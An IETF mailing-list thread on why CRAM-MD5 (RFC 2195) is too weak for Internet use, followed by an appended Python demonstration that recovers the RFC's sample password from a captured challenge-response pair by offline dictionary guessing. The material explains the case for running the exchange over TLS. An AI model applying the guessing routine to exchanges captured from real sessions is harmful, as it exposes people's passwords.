From: Christian Huitema
[mailto:huitema(_at_)windows(_dot_)microsoft(_dot_)com]
From: Kurt D. Zeilenga [mailto:Kurt(_at_)OpenLDAP(_dot_)org]
At 04:07 PM 9/7/2006, John C Klensin wrote:
I think we have a small misunderstanding here. Let me say more clearly and briefly.
My message was intended to clarify why the SASL WG is pursuing an Informational recommendation for its RFC2195bis work and to redirect any comments specific to this work to the WG's list.
Well, if I remember correctly, there was ample discussion of
this topic during the IETF meeting in Paris -- both Steve
Bellovin and I presented the issues with such techniques.
Basic challenge response mechanisms like CRAM-MD5 are simply
too weak to be used on the Internet. They are subject to
dictionary attacks, which can retrieve the password in a very
short time. They don't deserve much more than documentation
for historical purpose.
HTTP-Digest was designed under the constraint that it had to be patent royalty free. At the time every form of public key cryptography, including Diffie-Hellman, was under patent.
They are only useful if you have a strong password.
Unfortunately the mechanisms for password exchange that are not subject to
dictionary attacks are generally considered to be encumbered as well.
The solution to this particular problem is to use SSL as the transport. IMAP
and POP both support this use. It is a trivial matter to discover that IMAPS is
supported using an SRV record.
If the will is there this is all fixable.
Phill
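The weakness Christian and Phill describe above, shown concretely. This is an added example, not code from the thread or from any of the RFC 2195 implementations; the challenge/response pair is the worked example given in RFC 2195 itself, and the short word list is constructed for the demonstration. The point it makes is the one in the thread: once the challenge and the client's response have been observed on the wire, every password guess can be checked locally with one HMAC-MD5, so nothing limits the guessing rate except the attacker's CPU. The password's strength is the only remaining defense, which is why the thread recommends putting the exchange inside SSL/TLS (IMAPS, POP3S) so the pair is never observable in the first place.

```python
"""CRAM-MD5 (RFC 2195) and why a captured exchange can be tested offline."""
import base64
import hashlib
import hmac
from typing import Iterable, Optional, Tuple


def cram_md5_response(username: str, password: str, challenge: bytes) -> str:
    """RFC 2195 client response: "<username> <hex(HMAC-MD5(key=password, msg=challenge))>"."""
    digest = hmac.new(password.encode("utf-8"), challenge, hashlib.md5).hexdigest()
    return f"{username} {digest}"


def decode_exchange(server_line: str, client_line: str) -> Tuple[bytes, str]:
    """Undo the base64 framing used on the wire.

    Both lines travel in the clear on a plain IMAP/POP/SMTP connection, so
    anyone on the path sees exactly what this function returns.
    """
    challenge = base64.b64decode(server_line)
    response = base64.b64decode(client_line).decode("ascii")
    return challenge, response


def offline_guess(challenge: bytes, response: str,
                  candidates: Iterable[str]) -> Tuple[Optional[str], int]:
    """Return (matching_password, guesses_tried) for a captured exchange.

    No further contact with the server is needed: the response is a pure
    function of (challenge, password), so the server's lockout or rate limit
    never comes into play. That is the "dictionary attack" the thread refers to.
    """
    username, _, _ = response.partition(" ")
    tried = 0
    for candidate in candidates:
        tried += 1
        if cram_md5_response(username, candidate, challenge) == response:
            return candidate, tried
    return None, tried


# Worked example from RFC 2195 (user "tim", secret "tanstaaftanstaaf"):
#   S: + PDE4OTYuNjk3MTcwOTUyQHBvc3RvZmZpY2UucmVzdG9uLm1jaS5uZXQ+
#   C: dGltIGI5MTNhNjAyYzdlZGE3YTQ5NWI0ZTZlNzMzNGQzODkw
RFC2195_SERVER_LINE = "PDE4OTYuNjk3MTcwOTUyQHBvc3RvZmZpY2UucmVzdG9uLm1jaS5uZXQ+"
RFC2195_CLIENT_LINE = "dGltIGI5MTNhNjAyYzdlZGE3YTQ5NWI0ZTZlNzMzNGQzODkw"

# Constructed word list for the demonstration; a real list would be millions of entries.
CONSTRUCTED_WORDLIST = ["password", "letmein", "tanstaaf", "tanstaaftanstaaf"]


def demo() -> Tuple[Optional[str], int]:
    """Recover the RFC 2195 example secret from the captured pair alone."""
    challenge, response = decode_exchange(RFC2195_SERVER_LINE, RFC2195_CLIENT_LINE)
    return offline_guess(challenge, response, CONSTRUCTED_WORDLIST)


if __name__ == "__main__":
    found, tried = demo()
    print(f"recovered={found!r} after {tried} offline guesses, zero server round trips")
```

The same loop would run just as well against a response captured from a TLS-less IMAP session, which is why the thread's fix is transport protection rather than a tweak to the mechanism: with the exchange inside TLS the (challenge, response) pair never reaches the attacker, and with a strong password the word list never reaches the secret.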
_______________________________________________
Ietf mailing list
Ietf(_at_)ietf(_dot_)org
https://www1.ietf.org/mailman/listinfo/ietf